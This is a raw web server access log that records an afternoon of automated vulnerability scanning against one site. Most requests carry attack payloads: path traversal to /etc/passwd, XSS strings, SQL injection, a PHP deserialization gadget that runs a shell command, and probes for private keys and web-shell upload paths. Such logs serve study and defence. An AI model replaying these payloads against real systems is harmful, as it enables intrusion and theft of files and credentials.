72.44.65.82 - - [09/Mar/2023:12:15:37 +0530] "GET /index_sso.php HTTP/1.1" 404 1020
193.142.146.101 - - [09/Mar/2023:12:16:34 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:12:16:48 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:12:17:23 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:12:17:33 +0530] "GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:12:17:34 +0530] "GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1" 404 1044
193.47.61.251 - - [09/Mar/2023:12:22:32 +0530] "-" 400 -
193.47.61.251 - - [09/Mar/2023:12:22:32 +0530] "-" 400 -
193.47.61.251 - - [09/Mar/2023:12:22:33 +0530] "GET / HTTP/1.1" 200 11250
193.47.61.251 - - [09/Mar/2023:12:22:33 +0530] "GET / HTTP/1.1" 200 11250
46.174.191.30 - - [09/Mar/2023:12:25:28 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [09/Mar/2023:12:27:19 +0530] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:12:30:44 +0530] "GET /logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:12:34:47 +0530] "GET /.Dockerfile HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:12:35:41 +0530] "GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1100
72.44.65.82 - - [09/Mar/2023:12:36:59 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:12:40:59 +0530] "GET /search.htm?searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&searchstring2 HTTP/1.1" 404 1014
90.151.171.106 - - [09/Mar/2023:12:42:54 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:12:42:54 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:12:42:59 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:12:42:59 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:12:43:04 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:12:43:04 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [09/Mar/2023:12:43:09 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:12:43:09 +0530] "-" 400 -
5.235.233.214 - - [09/Mar/2023:12:44:00 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:12:44:01 +0530] "GET /reports/rwservlet/showenv HTTP/1.1" 404 1044
72.44.65.82 - - [09/Mar/2023:12:44:02 +0530] "GET /reports/rwservlet?JOBTYPE=rwurl&URLPARAMETER=file:///&desformat=html&destype=cache&report=test.rdf HTTP/1.1" 404 1028
92.118.39.82 - - [09/Mar/2023:12:46:29 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:12:47:44 +0530] "GET /api/settings/values HTTP/1.1" 404 1032
72.44.65.82 - - [09/Mar/2023:12:50:21 +0530] "POST /?ajax-request=jnews HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:12:50:33 +0530] "GET /cgi-bin/luci HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:12:51:13 +0530] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 1042
72.44.65.82 - - [09/Mar/2023:12:55:50 +0530] "GET null null" 400 -
192.241.225.18 - - [09/Mar/2023:13:00:42 +0530] "GET / HTTP/1.1" 200 11250
198.199.106.198 - - [09/Mar/2023:13:00:43 +0530] "GET / HTTP/1.1" 200 11250
192.241.225.18 - - [09/Mar/2023:13:01:01 +0530] "GET / HTTP/1.1" 200 11250
198.199.106.198 - - [09/Mar/2023:13:02:53 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:13:04:57 +0530] "GET /google-api-private-key.json HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:13:05:05 +0530] "GET /app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 1086
72.44.65.82 - - [09/Mar/2023:13:05:07 +0530] "GET /pimcore/app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 1102
72.44.65.82 - - [09/Mar/2023:13:10:25 +0530] "GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1" 404 1086
72.44.65.82 - - [09/Mar/2023:13:12:07 +0530] "GET /index.php?controller=../../../../../../../../etc/passwd&option=com_cartweberp HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:13:15:05 +0530] "GET null null" 400 -
90.151.171.106 - - [09/Mar/2023:13:15:12 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:13:15:12 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:13:15:13 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:13:15:13 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:13:15:13 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:13:15:18 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:13:15:19 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:13:15:20 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:13:16:37 +0530] "GET /_debug_toolbar/ HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:13:17:10 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:13:21:18 +0530] "POST /login.php HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:13:23:56 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:13:25:40 +0530] "POST /dolphinscheduler/login HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:13:25:51 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:25:51 +0530] "GET /..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:26:02 +0530] "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:26:03 +0530] "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:26:03 +0530] "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:26:14 +0530] "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:26:45 +0530] "GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:13:26:47 +0530] "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:26:51 +0530] "GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:13:26:52 +0530] "GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:13:26:58 +0530] "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:27:06 +0530] "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:27:14 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
72.44.65.82 - - [09/Mar/2023:13:27:15 +0530] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
72.44.65.82 - - [09/Mar/2023:13:27:17 +0530] "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1" 404 1110
72.44.65.82 - - [09/Mar/2023:13:27:19 +0530] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1110
72.44.65.82 - - [09/Mar/2023:13:27:23 +0530] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1114
72.44.65.82 - - [09/Mar/2023:13:27:24 +0530] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
72.44.65.82 - - [09/Mar/2023:13:28:31 +0530] "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:28:32 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 1092
72.44.65.82 - - [09/Mar/2023:13:28:32 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:28:40 +0530] "GET /index.php?page=etc/passwd HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:13:31:37 +0530] "GET /wpdmpro/list-packages/?order=asc&orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1038
199.195.248.153 - - [09/Mar/2023:13:33:50 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:13:36:44 +0530] "GET /index.php?Itemid=70&cid=1&option=com_cmimarketplace&viewit=/../../../../../../etc/passwd HTTP/1.1" 404 1012
193.142.146.101 - - [09/Mar/2023:13:37:12 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:13:43:25 +0530] "GET /app/etc/local.xml HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:13:43:25 +0530] "GET /app/etc/local.xml.additional HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:13:47:39 +0530] "GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:13:50:08 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:13:50:08 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:13:50:13 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:13:50:13 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:13:50:18 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [09/Mar/2023:13:50:18 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [09/Mar/2023:13:50:23 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:13:50:23 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:13:53:38 +0530] "GET /wp-admin/admin.php?format=csv&mec-ix-action=export-events&page=MEC-ix&tab=MEC-export HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:13:53:40 +0530] "GET /51.236.7z HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:13:53:42 +0530] "GET /51.7z HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:13:53:42 +0530] "GET /103.145.7z HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:53:46 +0530] "GET /103.145.51.236.bz2 HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:13:53:58 +0530] "GET /51.bz2 HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:13:54:54 +0530] "GET /cgi-bin/printenv HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:13:54:59 +0530] "GET /51.236.lz HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:13:55:00 +0530] "GET /51.lz HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:13:55:00 +0530] "GET /103.145.lz HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:55:02 +0530] "GET /103.145.51.236.rar HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:13:55:03 +0530] "GET /51.236.rar HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:55:06 +0530] "GET /51.rar HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:13:55:34 +0530] "GET /51.236.tar.gz HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:13:55:55 +0530] "GET /103.145.51.236.tar.bz2 HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:13:56:06 +0530] "GET /51.tar.bz2 HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:56:48 +0530] "GET /103.145.xz HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:56:58 +0530] "GET /51.236.zip HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:56:59 +0530] "GET /51.zip HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:13:57:07 +0530] "GET /103.145.zip HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:13:57:08 +0530] "GET /103.145.51.236.z HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:13:57:16 +0530] "GET /51.236.z HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:13:58:18 +0530] "GET /103.145.51.236.db HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:13:58:30 +0530] "GET /51.db HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:13:58:31 +0530] "GET /103.145.db HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:13:58:31 +0530] "GET /103.145.51.236.sqlite HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:13:58:35 +0530] "GET /51.236.sqlite HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:13:59:49 +0530] "GET /51.236.sql.7z HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:14:00:02 +0530] "GET /103.145.sql.7z HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:14:00:04 +0530] "GET /103.145.51.236.sql.bz2 HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:14:00:08 +0530] "GET /51.236.sql.bz2 HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:14:00:42 +0530] "GET /51.236.sql.gz HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:14:01:16 +0530] "GET /index.php?controller=../../../../../../../../../etc/passwd&option=com_omphotogallery HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:14:01:22 +0530] "GET /51.sql.lz HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:14:01:46 +0530] "GET /51.236.sql.rar HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:14:02:34 +0530] "GET /51.sql.tar.gz HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:14:02:37 +0530] "GET /103.145.sql.tar.gz HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:14:02:49 +0530] "GET /51.236.sql.xz HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:14:02:50 +0530] "GET /51.sql.xz HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:14:02:57 +0530] "GET /103.145.sql.xz HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:14:03:05 +0530] "GET /103.145.51.236.sql.zip HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:14:03:09 +0530] "GET /51.236.sql.zip HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:14:03:09 +0530] "GET /51.sql.zip HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:14:03:30 +0530] "GET /51.236.sql.z HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:14:03:41 +0530] "GET /103.145.sql.z HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:14:03:49 +0530] "GET /103.145.51.236.sql.tar.z HTTP/1.1" 404 1042
72.44.65.82 - - [09/Mar/2023:14:03:50 +0530] "GET /51.236.sql.tar.z HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:14:04:13 +0530] "PUT /_snapshot/test HTTP/1.1" 403 1004
72.44.65.82 - - [09/Mar/2023:14:04:24 +0530] "GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:14:05:50 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:14:08:43 +0530] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:14:08:57 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:14:08:58 +0530] "GET /hw-sys.htm HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:14:13:07 +0530] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:14:14:38 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:14:14:48 +0530] "GET /MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain) HTTP/1.1" 404 1070
72.44.65.82 - - [09/Mar/2023:14:17:56 +0530] "GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1098
72.44.65.82 - - [09/Mar/2023:14:19:27 +0530] "GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:14:21:29 +0530] "GET /admin/index.php?page=home HTTP/1.1" 404 1024
90.151.171.108 - - [09/Mar/2023:14:23:00 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:14:23:00 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:14:23:05 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:14:23:05 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:14:23:10 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [09/Mar/2023:14:23:10 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:14:23:15 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:14:23:15 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:14:26:34 +0530] "GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:14:30:05 +0530] "GET /logout?next=%208%22onmouseover=%22alert(document.domain) HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:14:32:13 +0530] "POST /index.php?action=login.index HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:14:34:45 +0530] "POST /VisionHubWebApi/api/Login HTTP/1.1" 404 1044
193.142.146.101 - - [09/Mar/2023:14:39:29 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:14:39:29 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:14:40:10 +0530] "GET /mod/lti/auth.php?redirect_uri=javascript:alert('2Mgie7hAA4xcKAPRbRlDsnFnsLi') HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:14:40:59 +0530] "GET null null" 400 -
117.211.36.141 - - [09/Mar/2023:14:44:44 +0530] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1040
72.44.65.82 - - [09/Mar/2023:14:48:20 +0530] "POST /admin/index.php HTTP/1.1" 404 1024
90.151.171.106 - - [09/Mar/2023:14:49:18 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:14:49:18 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:14:49:23 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:14:49:23 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:14:49:29 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:14:49:29 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:14:49:33 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:14:49:33 +0530] "-" 400 -
78.108.177.54 - - [09/Mar/2023:14:56:20 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [09/Mar/2023:14:56:21 +0530] "GET /metadata/v1.json HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:14:58:47 +0530] "GET /hoteldruid/inizio.php HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:14:58:54 +0530] "GET /inizio.php HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:14:59:04 +0530] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 1120
72.44.65.82 - - [09/Mar/2023:15:00:18 +0530] "GET /index.php?advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype&p=banlist HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:00:29 +0530] "GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1" 404 1044
72.44.65.82 - - [09/Mar/2023:15:01:15 +0530] "GET /plugin HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:15:06:09 +0530] "GET /index.php?folder=../../../../../../../../../../../../../../../tmp/&g=element&method=onAjax_files&option=com_fabrik&plugin=image&task=plugin.pluginAjax HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:08:16 +0530] "GET /index.php?data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==&r=test/sss HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:10:40 +0530] "POST /login.cgi HTTP/1.1" 404 1012
45.128.232.128 - - [09/Mar/2023:15:11:53 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:15:16:20 +0530] "GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:15:17:07 +0530] "GET /admin/elfinder/elfinder-cke.html HTTP/1.1" 404 1058
72.44.65.82 - - [09/Mar/2023:15:17:08 +0530] "GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 404 1076
72.44.65.82 - - [09/Mar/2023:15:17:16 +0530] "GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1" 404 1064
72.44.65.82 - - [09/Mar/2023:15:17:36 +0530] "GET /elfinder/elfinder-cke.html HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:15:17:57 +0530] "GET /uploads/elfinder/elfinder-cke.html HTTP/1.1" 404 1062
90.151.171.108 - - [09/Mar/2023:15:18:58 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:15:18:58 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:15:19:03 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:15:19:03 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:15:19:08 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [09/Mar/2023:15:19:08 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:15:19:13 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:15:19:13 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:15:20:49 +0530] "POST /login.php HTTP/1.1" 404 1012
45.128.232.128 - - [09/Mar/2023:15:23:02 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:15:26:29 +0530] "GET /?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:15:26:38 +0530] "GET /admin/index.php?cmd=mkfile&name=2Mgie9Wlcf21uPqBOzRYDep9426.php&op=elfinder&p=ajax-ops&target=l1_Lw HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:15:27:39 +0530] "GET /files.md5 HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:27:40 +0530] "GET /testrail/files.md5 HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:15:27:55 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:15:31:59 +0530] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:15:37:47 +0530] "GET /static/%5C%5C..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:15:38:07 +0530] "POST /admin/login/?next=/admin/ HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:15:39:41 +0530] "GET /?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:15:42:46 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_powermail HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:43:23 +0530] "GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:46:54 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:15:47:09 +0530] "GET /oliver/FileServlet?fileName=c:/windows/win.ini&source=serverFile HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:15:50:07 +0530] "GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:53:35 +0530] "POST /account HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:15:53:43 +0530] "POST /account HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:15:54:11 +0530] "GET /login/ HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:15:58:24 +0530] "POST null null" 400 -
72.44.65.82 - - [09/Mar/2023:15:58:42 +0530] "GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:15:59:53 +0530] "GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1" 404 1094
72.44.65.82 - - [09/Mar/2023:16:00:26 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:16:00:53 +0530] "GET /NCFindWeb?filename=../../ierp/bin/prop.xml&service=IPreAlertConfigService HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:16:03:10 +0530] "GET /src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:16:04:14 +0530] "GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/2MgidrhuGINASRzD6lkVf24C25y/)%3B%2F%2F HTTP/1.1" 404 1016
